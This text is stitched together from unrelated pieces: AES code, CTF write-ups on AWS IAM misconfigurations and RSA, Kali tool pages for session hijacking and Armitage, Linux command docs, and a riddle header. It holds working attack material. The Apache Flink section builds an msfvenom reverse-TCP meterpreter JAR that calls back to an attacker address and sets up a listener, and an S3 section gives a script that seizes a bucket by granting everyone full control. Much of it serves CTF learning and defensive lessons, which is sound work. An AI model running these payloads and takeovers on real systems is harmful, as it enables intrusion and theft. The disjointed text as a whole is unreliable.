                   gfp14[state[i][2]] ^ gfp11[state[i][3]])
        n[i][3] = (gfp11[state[i][0]] ^ gfp13[state[i][1]] ^
                   gfp9[state[i][2]] ^ gfp14[state[i][3]])
    return n


def AddRoundKey(state, key):
    # XOR the state with the round key, byte by byte
    Nb = len(state)
    new_state = [[None for j in range(4)] for i in range(Nb)]
    for i, word in enumerate(state):
        for j, byte in enumerate(word):
            new_state[i][j] = byte ^ key[i][j]
    return new_state
---
title: WIZ IAM Challenge Writeup
---

<center><h1>WIZ IAM Challenge Writeup</h1></center>

---

Wiz recently released a cloud-security CTF, The Big IAM Challenge: [bigiamchallenge.com](https://bigiamchallenge.com/)

I worked through it myself and learned a lot along the way. Below is a record of how I solved each challenge.

<div align=center><img width="700" src="/img/1688698467.png" div align=center/></div>

## 1. Buckets of Fun

The first challenge is called Buckets of Fun. The first challenge of a CTF is usually a freebie, and this one is no exception.

The challenge provides the following bucket policy:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}
```

From the policy we can see that this bucket allows public object listing and public reads. Since the challenge gives us the bucket name, the full URL is: [https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com](https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/)

Visiting this address directly reveals the key corresponding to the FLAG:

<img width="900" src="/img/1688698501.png"></br>

Fetching that key yields the FLAG:

<img width="900" src="/img/1688698538.png"></br>

The takeaway: buckets should not allow public access or public object listing, or sensitive information may leak.

## 2. Google Analytics

The second challenge is called ~~Google~~ Analytics, with this policy:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}
```

This policy grants everyone permission to send and receive messages on this SQS queue.

SQS (Simple Queue Service) provides reliable message delivery between applications. It acts like a message relay: it moves messages from one place to another and ensures they are safely delivered and processed, so applications can communicate and cooperate.

According to the official documentation, calling the ReceiveMessage API requires the Queue URL, whose main components are the Account ID and the queue name. The policy gives us both values, so we can construct the Queue URL: [https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2](https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2)

Finally, use the AWS CLI's SQS receive-message API, specifying the queue URL with the --queue-url parameter:

```bash
aws sqs receive-message --queue-url https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
```

The response contains a URL:

<img width="1000" src="/img/1688698682.png"></br>

Visiting that URL reveals the FLAG:

<img width="900" src="/img/1688698726.png"></br>

The takeaway: SQS queues should not allow the public to receive their messages, or sensitive information may leak in transit.

## 3. Enable Push Notifications

The third challenge is called Enable Push Notifications, with this policy:

```json
{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}
```

This policy grants Subscribe permission on the SNS topic to anyone whose endpoint ends with @tbic.wiz.io.

SNS (Simple Notification Service) helps developers push notifications to mobile devices, e-mail, message queues and many other endpoints, making it easy to deliver important information and real-time updates to users. In short, SNS is a message broadcast system that quickly and reliably delivers messages to subscribers.

The AWS CLI's SNS Subscribe call needs a protocol, a notification endpoint, and a topic ARN. We already know the ARN from the policy, so we need to craft a notification endpoint that ends with @tbic.wiz.io:

```bash
> aws sns subscribe help

subscribe
--topic-arn <value>
--protocol <value>
[--notification-endpoint <value>]
```

The official documentation lists the supported protocols: HTTP, HTTPS, EMAIL, SMS, SQS and so on. We can craft an HTTP endpoint such as [http://123.123.123.123:800/@tbic.wiz.io](http://123.123.123.123:800/@tbic.wiz.io), which satisfies the policy condition; when we subscribe, we will receive a message from the topic.

First, listen on a port on our own server with NC:

```bash
nc -lvk 80
```

Then run:

```bash
aws sns subscribe --protocol http --notification-endpoint http://123.123.123.123:800/@tbic.wiz.io --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
```

NC then receives a request containing a Token, which we will need shortly:

<img width="800" src="/img/1688698763.png"></br>

According to the official documentation, when subscribing from a different AWS account than the topic's, a confirmation step is required, and that step uses the Token returned by the topic.

Confirm the subscription with:

```bash
aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 336412f37fb687f5d51e6e2425c464de257ebd13d0594......
```

After running this command and waiting a moment, the server receives the message containing the FLAG:

<img width="800" src="/img/1688698787.png"></br>

The difficulty is clearly ramping up: besides abusing publicly exposed permissions, this challenge involves bypassing a restriction in the policy's condition.

So when writing policies, beyond not granting overly broad permissions, also check whether any condition in the policy can be bypassed.

## 4. Admin only?

The fourth challenge is called "Admin only?", with this policy:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}
```

This is an S3 challenge again, with the same idea as the first one: find the FLAG's key, then fetch it.

So the goal is to obtain the FLAG's key, but the policy grants ListBucket only to the principal arn:aws:iam::133713371337:user/admin. The problem now is how to bypass that restriction.

The official documentation tells us: with ForAllValues, if the request contains no key, or the key value resolves to an empty data set (such as an empty string), the condition also returns true. Do not use ForAllValues with the Allow effect, because it can be overly permissive.

In other words, if we leave aws:PrincipalArn empty in the request, the condition evaluates to true, and the restriction is bypassed.

First, send a request that carries our aws:PrincipalArn:

```bash
> aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix 'files/'

An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied
```

Access is denied. Now try with `--no-sign-request`:

```bash
> aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix 'files/' --no-sign-request
{
    "Contents": [
        {
            "Key": "files/flag-as-admin.txt",
            "LastModified": "2023-06-07T19:15:43+00:00",
            "ETag": "\"e365cfa7365164c05d7a9c209c4d8514\"",
            "Size": 42,
            "StorageClass": "STANDARD"
        },
        {
            "Key": "files/logo-admin.png",
            "LastModified": "2023-06-08T19:20:01+00:00",
            "ETag": "\"c57e95e6d6c138818bf38daac6216356\"",
            "Size": 81889,
            "StorageClass": "STANDARD"
        }
    ]
}
```

Now the bucket's objects are listed, and we can fetch the FLAG:

<img width="900" src="/img/1688699129.png"></br>

On the command line we need `--no-sign-request` because the AWS CLI signs requests with the configured identity by default. A browser request carries no identity information at all, so there is an even simpler approach: just browse to the bucket with the prefix appended:

<img width="900" src="/img/1688699141.png"></br>

This challenge shows that naming an authorized principal in a policy does not automatically make it safe; watch out for ForAllValues. How to defend against this? Simply replace ForAllValues with ForAnyValue: when the key set is empty, ForAnyValue returns False instead of True, so unauthorized access is met with AccessDenied:

<img width="1000" src="/img/1688699176.png"></br>

## 5. Do I know you?

The fifth challenge is called "Do I know you?". The challenge text reads: "We configured AWS Cognito as our main identity provider. Hopefully we didn't make any mistakes." The policy is:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}
```

From the challenge text we know this one is about AWS Cognito, and that the Cognito configuration is presumably flawed.

AWS Cognito is a managed service that makes it easy to add user authentication and authorization to applications. It provides sign-up, sign-in, and user management, supports common authentication methods such as username/password, social logins and identity provider federation, offers security, scalability and customizability, and integrates with other AWS services.

First, how is Cognito used? According to the official documentation, you create an Amazon Cognito identity pool, use the pool ID with the SDK to obtain temporary credentials, and then use those credentials to act on resources.

I first tested with an identity pool of my own and got a permission error, which is expected. So the next step is to find their identity pool ID. It turns out the pool ID sits right in the source code of the challenge page:

<img width="1000" src="/img/1688699198.png"></br>

With the pool ID we can call the relevant services through the SDK. ChatGPT can generate the code directly, though it may have small issues that need manual fixing. Here is a working version:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Cognito JavaScript SDK Example</title>
  <script src="https://sdk.amazonaws.com/js/aws-sdk-2.100.0.min.js"></script>
</head>
<body>
  <script>
    // Initialize the AWS SDK configuration
    AWS.config.region = 'us-east-1';
    AWS.config.credentials = new AWS.CognitoIdentityCredentials({
      IdentityPoolId: 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b',
    });

    // Obtain temporary credentials
    AWS.config.credentials.get(function(err) {
      if (!err) {
        // Credentials obtained successfully
        var accessKeyId = AWS.config.credentials.accessKeyId;
        var secretAccessKey = AWS.config.credentials.secretAccessKey;
        var sessionToken = AWS.config.credentials.sessionToken;

        // Proceed, e.g. access S3
        accessS3(accessKeyId, secretAccessKey, sessionToken);
      } else {
        // Failed to obtain credentials
        console.error('Error retrieving credentials: ' + err);
      }
    });

    // Access S3 with the temporary credentials
    function accessS3(accessKeyId, secretAccessKey, sessionToken) {
      var s3 = new AWS.S3({
        accessKeyId: accessKeyId,
        secretAccessKey: secretAccessKey,
        sessionToken: sessionToken,
      });

      var params = {
        Bucket: 'wiz-privatefiles',
      };

      s3.getSignedUrl('listObjectsV2', params, function(err, data) {
        if (!err) {
          // Bucket listing URL generated successfully
          console.log(data);
        } else {
          // Failed to generate the bucket listing URL
          console.error('Error listing S3 buckets: ' + err);
        }
      });
    }
  </script>
</body>
</html>
```

Open this HTML file in a browser, and the console prints a URL:

<img width="800" src="/img/1688699225.png"></br>

Visiting it lists the bucket's objects:

<img width="800" src="/img/1688699245.png"></br>

This tells us the FLAG's key is flag1.txt. Modify the code to read that object instead:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Cognito JavaScript SDK Example</title>
  <script src="https://sdk.amazonaws.com/js/aws-sdk-2.100.0.min.js"></script>
</head>
<body>
  <script>
    // Initialize the AWS SDK configuration
    AWS.config.region = 'us-east-1';
    AWS.config.credentials = new AWS.CognitoIdentityCredentials({
      IdentityPoolId: 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b',
    });

    // Obtain temporary credentials
    AWS.config.credentials.get(function(err) {
      if (!err) {
        // Credentials obtained successfully
        var accessKeyId = AWS.config.credentials.accessKeyId;
        var secretAccessKey = AWS.config.credentials.secretAccessKey;
        var sessionToken = AWS.config.credentials.sessionToken;

        // Proceed, e.g. access S3
        accessS3(accessKeyId, secretAccessKey, sessionToken);
      } else {
        // Failed to obtain credentials
        console.error('Error retrieving credentials: ' + err);
      }
    });

    // Access S3 with the temporary credentials
    function accessS3(accessKeyId, secretAccessKey, sessionToken) {
      var s3 = new AWS.S3({
        accessKeyId: accessKeyId,
        secretAccessKey: secretAccessKey,
        sessionToken: sessionToken,
      });

      var params = {
        Bucket: 'wiz-privatefiles',
        Key: 'flag1.txt',
      };

      s3.getSignedUrl('getObject', params, function(err, data) {
        if (!err) {
          // Object URL generated successfully
          console.log(data);
        } else {
          // Failed to generate the object URL
          console.error('Error get S3 bucket object: ' + err);
        }
      });
    }
  </script>
</body>
</html>
```

Open this HTML in a browser and copy the link from the console to get the FLAG:

<img width="900" src="/img/1688699266.png"></br>

This challenge teaches us to protect our identity pool IDs. Also, identity pools come in two flavors: those that disallow unauthenticated (guest) access and those that allow it. When creating an identity pool, choose to disallow unauthenticated access:

<img width="1000" src="/img/1688699289.png"></br>

With unauthenticated access disabled, anonymous calls get an unauthorized-access error instead of being handed temporary tokens:

<img width="900" src="/img/1688699306.png"></br>

## 6. One final push

The sixth and final challenge is called One final push. The challenge text reads: "Anonymous access is now disabled. Let's see what you can do now, this time with an authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role". The policy is:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}
```

This challenge is an extension of the previous one; the identity pool ID is the same.

The policy's Action allows obtaining STS credentials via AssumeRoleWithWebIdentity.

From the official documentation, generating STS credentials with AssumeRoleWithWebIdentity needs three things:

```bash
> aws sts assume-role-with-web-identity help

--role-arn <value>
--role-session-name <value>
--web-identity-token <value>
```

The role-arn is given in the challenge, and role-session-name can be anything we choose, so all that remains is the web-identity-token.

According to the official documentation (and ChatGPT), the web-identity-token can be obtained from the identity pool ID, and the relevant token-issuing APIs are public and require no authorization.

To get the token, first use the pool ID to obtain an identity ID:

```bash
> aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db"
}
```

Then use the identity ID to obtain a token; this API is also public and needs no permissions:

```bash
> aws cognito-identity get-open-id-token --identity-id us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db
{
    "IdentityId": "us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db",
    "Token": "eyJraWQiOiJ1cy1lYXN0Lxxxx..."
}
```

Finally, with all of the above, call assume-role-with-web-identity to generate STS credentials:

```bash
> aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name teamssix --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoi...
{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXDFQ6KRE3",
        "SecretAccessKey": "Wqk43MfgwPM5F7Z9IfFgv24RwHuCVDh8M0swTUyj",
        "SessionToken": "IQoJb3JpZ2luX2VjEND...",
        "Expiration": "2023-07-06T16:36:18+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:teamssix",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/teamssix"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
```

Configure the STS credentials via environment variables:

```bash
> export AWS_ACCESS_KEY_ID=ASIARK7LBOHXDFQ6KRE3
> export AWS_SECRET_ACCESS_KEY=Wqk43MfgwPM5F7Z9IfFgv24RwHuCVDh8M0swTUyj
> export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEND...
```

Then list the buckets — these are exactly the buckets used by all the challenges above:

```bash
> aws s3 ls
2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000
```

Finally, the FLAG file is found in the wiz-privatefiles-x1000 bucket:

```bash
aws s3api get-object --bucket wiz-privatefiles-x1000 --key flag2.txt flag2.txt
```

<img width="900" src="/img/1688699331.png"></br>

Done — final FLAG obtained.

At this point we can draw a conclusion: given an identity pool ID and the ARN of its associated role, you can obtain that role's permissions. So take care not to leak either of these in day-to-day work.

All in all, these six challenges teach a great deal. Solving them required reading plenty of official documentation; ChatGPT was a very helpful assistant, and I also consulted several other write-ups, all listed in the references. They may help you too when you attempt this IAM challenge yourself.

> References:
>
> 1. [https://docs.aws.amazon.com/zh_cn/AWSSimpleQueueService/latest/SQSDeveloperGuide/welcome.html](https://docs.aws.amazon.com/zh_cn/AWSSimpleQueueService/latest/SQSDeveloperGuide/welcome.html)
> 2. [https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html](https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html)
> 3. [https://docs.aws.amazon.com/zh_cn/sns/latest/dg/welcome.html](https://docs.aws.amazon.com/zh_cn/sns/latest/dg/welcome.html)
> 4. [https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html](https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html)
> 5. [https://docs.aws.amazon.com/cli/latest/reference/sns/confirm-subscription.html](https://docs.aws.amazon.com/cli/latest/reference/sns/confirm-subscription.html)
> 6. [https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_multi-value-conditions.html#reference_policies_multi-key-or-value-conditions](https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_multi-value-conditions.html#reference_policies_multi-key-or-value-conditions)
> 7. [https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/getting-started-with-identity-pools.html](https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/getting-started-with-identity-pools.html)
> 8. [https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html)
> 9. [https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html)
> 10. [https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html)
> 11. [https://medium.com/@ayush.guha/ctf-thebigiamchallenge-walkthrough-534d727eb0d8](https://medium.com/@ayush.guha/ctf-thebigiamchallenge-walkthrough-534d727eb0d8)
> 12. [https://zhuanlan.zhihu.com/p/640694595](https://zhuanlan.zhihu.com/p/640694595)
# hamster-sidejack Package Description

Hamster is a session hijacking (sidejacking) tool. It acts as a proxy server and lets you hijack other people's sessions by replacing your cookies with session cookies stolen from them. Cookies are sniffed with the companion Ferret program, so you will also need a copy of it.

[hamster-sidejack Homepage](http://www.erratasec.com/) | [Kali hamster-sidejack Repo](http://git.kali.org/gitweb/?p=packages/hamster-sidejack.git;a=summary)

- **Author**: Robert Graham
- **License**: Free

## Tools included in hamster-sidejack

### hamster — a session hijacking tool

## hamster usage example

```
root@kali:~# hamster
--- HAMPSTER 2.0 side-jacking tool ---
Set the browser to use the proxy http://127.0.0.1:1234
Set target open port (1234)
Set local listening port (1234)
Proxy: listening on 127.0.0.1:1234
begin thread
```

[Original link](http://tools.kali.org/sniffingspoofing/hamster-sidejack)
lsusb
===

Display the list of USB devices on the local machine

## Description

The **lsusb command** displays the local machine's USB device list along with detailed information about each USB device.

lsusb is a handy aid for learning USB driver development and understanding USB devices. If your development board or product lacks the lsusb command, you can port it yourself and add it to the filesystem.

### Syntax

```shell
lsusb(options)
```

### Options

```shell
-v: show detailed USB device information;
-s <bus:devnum>: show only the device with the given bus and/or device number;
-d <vendor:product>: show only devices with the given vendor and product ID;
-t: show the physical USB device hierarchy as a tree;
-V: show version information.
```

### Example

Output of lsusb after plugging in a USB mouse:

```shell
Bus 005 Device 001: id 0000:0000
Bus 001 Device 001: ID 0000:0000
Bus 004 Device 001: ID 0000:0000
Bus 003 Device 001: ID 0000:0000
Bus 002 Device 006: ID 15d9:0a37
Bus 002 Device 001: ID 0000:0000
```

Explanation:

**Bus 005** means the fifth USB host controller (the machine has 5 USB host controllers in total — check with `lspci | grep USB`).

**Device 006** is the device number (devnum) the system assigned to the USB mouse; it also shows the mouse is attached to the second USB host controller.

```shell
006 usb_device.devnum
/sys/devices/pci0000:00/0000:00:1d.1/usb2/2-2/devnum
```

**ID 15d9:0a37** is the USB device's ID (set by the chip manufacturer; it uniquely identifies the device).

```shell
15d9 usb_device_descriptor.idVendor
0a37 usb_device_descriptor.idProduct
/sys/devices/pci0000:00/0000:00:1d.1/usb2/2-2/idVendor
```

**Bus 002 Device 006: ID 15d9:0a37 / Bus 002 Device 001: ID 0000:0000** means two devices are attached to host controller 002:

* the USB root hub — 001
* the USB mouse — 006
# The best RSA (crypto 250)

This was a very badly designed task. We prepared the expected solver, but we didn't get the flag simply because we assumed it couldn't be the right solution. Apparently the author thought it was a great idea to prepare a task which requires hours (!) of heavy multithreaded computation.

We get [data](data.txt) with a very, very long ciphertext and a very, very long modulus. However, it's quite simple to notice that the modulus is divisible by 5, and a quick check shows that it can actually be factored into primes <= 251. The only problem is that there are about 1500 of each prime, so the modulus is something like:

`n = 3^14XX * 5^14XX * ... * 251^14XX`

We can quickly factor this with a small sieve. The naive approach would be to calculate `d` and `fi(n)` and decrypt the message, but this would take forever. A smarter approach is to use RSA-CRT: calculate `c^d mod p1`, `c^d mod p2`, ... where `p1 = 3^14XX`, `p2 = 5^14XX` etc., and then use the Chinese Remainder Theorem to combine them into the final value. But this again takes a very, very long time to compute. We even tried to speed this up using Hensel lifting when calculating each of the values, but it didn't help that much.

Therefore we simply decided we had missed something here, because it's just stupid to force us to run hours of computations. Apparently we hadn't, and this was the intended solution...
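The RSA-CRT approach described above can be sketched in a few lines. This is a toy-sized illustration — the prime powers, message and exponent below are made up for the example; the real modulus had dozens of prime powers with exponents around 1500. Per prime power, the private exponent is reduced modulo φ(p^k), which gives the same residue as using the full `d`.

```python
# Sketch of RSA-CRT decryption over pairwise-coprime prime powers.
from functools import reduce

def crt(residues, moduli):
    # Combine x = r_i (mod m_i) into x mod prod(m_i)
    M = reduce(lambda a, b: a * b, moduli)
    x = 0
    for r, m in zip(residues, moduli):
        Mi = M // m
        x += r * Mi * pow(Mi, -1, m)
    return x % M

def decrypt_crt(c, e, prime_powers):
    residues, moduli = [], []
    for p, k in prime_powers:
        m = p ** k
        phi = p ** (k - 1) * (p - 1)   # Euler phi of a prime power
        d = pow(e, -1, phi)            # per-factor private exponent
        residues.append(pow(c, d, m))  # c^d mod p^k
        moduli.append(m)
    return crt(residues, moduli)

# Toy example: n = 3^5 * 5^4 * 7^3; the message must be coprime to n
pp = [(3, 5), (5, 4), (7, 3)]
n = 3**5 * 5**4 * 7**3
e = 65537
msg = 424243
c = pow(msg, e, n)
assert decrypt_crt(c, e, pp) == msg
```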
---
title: Writable Bucket ACL
---

<center><h1>Writable Bucket ACL</h1></center>

---

Listing the target bucket is denied:
</br>
<img width="1000" src="/img/1650006428.png"></br>

Reading the target bucket's ACL shows that it is readable, with the following policy:

```bash
aws s3api get-bucket-acl --bucket teamssix
```

</br>
<img width="800" src="/img/1650006456.png"></br>

Consulting the official documentation:
</br>
<img width="1200" src="/img/1650006484.png"></br>
</br>
<img width="1200" src="/img/1650006510.png"></br>

From the documentation we can conclude that this policy means anyone can read and write the ACL of the current bucket.

In other words, if we change the permission to FULL_CONTROL, we can take control of this bucket. The modified policy is:

```json
{
    "Owner": {
        "ID": "d24***5"
    },
    "Grants": [
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AllUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}
```

Write the policy back:

```bash
aws s3api put-bucket-acl --bucket teamssix --access-control-policy file://acl.json
```

</br>
<img width="1000" src="/img/1650006554.png"></br>

Trying again, the objects can now be listed:
</br>
<img width="1000" src="/img/1650006615.png"></br>

> References:
>
> https://mp.weixin.qq.com/s/eZ8OAO5ELgUNvVricIStGA
>
> https://mp.weixin.qq.com/s/r0DuASP6gH_48b5sJ1DCTw
>
> https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/acl-overview.html
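The same ACL takeover can be done with boto3 instead of the CLI. This is a minimal sketch following the example above; the bucket name is the one from the write-up, so substitute your own target.

```python
# Sketch: read the world-writable ACL, then grant AllUsers FULL_CONTROL.
import boto3

s3 = boto3.client("s3")
acl = s3.get_bucket_acl(Bucket="teamssix")  # the ACL is publicly readable

s3.put_bucket_acl(
    Bucket="teamssix",
    AccessControlPolicy={
        "Owner": acl["Owner"],  # keep the original owner untouched
        "Grants": [{
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AllUsers",
            },
            "Permission": "FULL_CONTROL",
        }],
    },
)
# Listing should now succeed
print(s3.list_objects_v2(Bucket="teamssix").get("KeyCount"))
```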
# Armitage Toolkit Overview

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

For example, through one instance of Metasploit, your team will:

- Share sessions.
- Share target hosts, captured data, and downloaded files.
- Communicate through a shared event log.
- Run bots to automate red team tasks.

Armitage is a force multiplier for red team operations.

Source: http://www.fastandeasyhacking.com/manual#0

[Armitage Homepage](http://www.fastandeasyhacking.com/) | [Kali Armitage Repo](https://gitlab.com/kalilinux/packages/armitage.git;a=summary)

- Author: Strategic Cyber LLC
- License: BSD

## Tools included in Armitage

### armitage — Red team collaboration tool

A scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the framework's advanced post-exploitation features.

### teamserver — Armitage Teamserver component

```
root@kali:~# teamserver
[*] You must provide: <external IP address> <team password>

    <external IP address> must be reachable by Armitage clients on port 55553
    <team password> is a shared password your team uses to authenticate to the Armitage team server
```

### armitage usage example

```bash
root@kali:~# armitage
[*] Starting msfrpcd for you.
```

![](http://tools.kali.org/wp-content/uploads/2014/02/armitage.png)

### teamserver usage example

Start a teamserver on an external IP ***(192.168.1.202)*** with the team password ***(s3cr3t)***:

```
root@kali:~# teamserver 192.168.1.202 s3cr3t
[*] Generating X509 certificate and keystore (for SSL)
[*] Starting RPC daemon
[*] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg...
[*] MSGRPC backgrounding at 2014-05-14 15:05:46 -0400...
[*] sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[-] Java 1.6 is not supported with this tool. Please upgrade to Java 1.7
[*] Use the following connection details to connect your clients:
    Host: 192.168.1.202
    Port: 55553
    User: msf
    Pass: s3cr3t

[*] Fingerprint (check for this string when you connect):
    a3b60bef430037a6b628d9011924341b8c09081
[+] multi-player metasploit... ready to go
```
# Apache Flink Unauthorized Access Vulnerability

## Description

The Apache Flink Dashboard has no user authentication by default. Through the unauthenticated Flink Dashboard console, an attacker can directly upload a trojan JAR and execute arbitrary system commands remotely to take control of the server.

## Environment setup

Tested version: flink-1.15.1

Edit `flink-1.15.1/conf/flink-conf.yaml` to open port 8081.

![image-20220726112749940](../../.gitbook/assets/image-20220726112749940.png)

Start Flink:

```
start-cluster.sh
```

## Exploitation

Open the web page:

![image-20220726112140644](../../.gitbook/assets/image-20220726112140644.png)

Generate rce.jar with msfvenom:

```
┌──(root💀kali)-[/tmp]
└─# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.32.130 LPORT=4444 -f jar > rce.jar
Payload size: 5310 bytes
Final size of jar file: 5310 bytes
```

Configure the msf listener:

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 1291.68.32.130
lhost => 1291.68.32.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
```

Upload `rce.jar` under Submit New Job and click Submit:

![image-20220726112442088](../../.gitbook/assets/image-20220726112442088.png)

Shell obtained:

![image-20230129203132779](../../.gitbook/assets/image-20230129203132779.png)
.\" DO NOT MODIFY THIS FILE!  It was generated by help2man 1.29.
.TH TEXINDEX "1" "June 2003" "texindex 4.6" "User Commands"
.SH NAME
texindex \- sort Texinfo index files
.SH SYNOPSIS
.B texindex
[\fIOPTION\fR]... \fIFILE\fR...
.SH DESCRIPTION
Generate a sorted index for each TeX output FILE.
Usually FILE... is specified simply as `foo.??' for a document `foo.texi'.
.SH OPTIONS
.TP
\fB\-h\fR, \fB\-\-help\fR
display this help and exit
.TP
\fB\-k\fR, \fB\-\-keep\fR
keep temporary files around after processing
.TP
\fB\-\-no\-keep\fR
do not keep temporary files around after processing (this is the default)
.TP
\fB\-o\fR, \fB\-\-output\fR FILE
save output as FILE
.TP
\fB\-\-version\fR
display version information and exit
.SH "REPORTING BUGS"
Send bug reports to bug-texinfo@gnu.org,
general questions and discussion to help-texinfo@gnu.org.
Texinfo home page: http://www.gnu.org/software/texinfo/
.SH COPYRIGHT
Copyright \(co 2003 Free Software Foundation, Inc.
There is NO warranty.  You may redistribute this software
under the terms of the GNU General Public License.
For more information about these matters, see the files named COPYING.
.SH "SEE ALSO"
The full documentation for
.B texindex
is maintained as a Texinfo manual.  If the
.B info
and
.B texindex
programs are properly installed at your site, the command
.IP
.B info texindex
.PP
should give you access to the complete manual.
<div>
<h1>The Aman (Military Intelligence) Riddle - Passover 5781</h1>
<p>
For the Passover holiday, the Intelligence Directorate published a short riddle. Here is its solution.
</p>
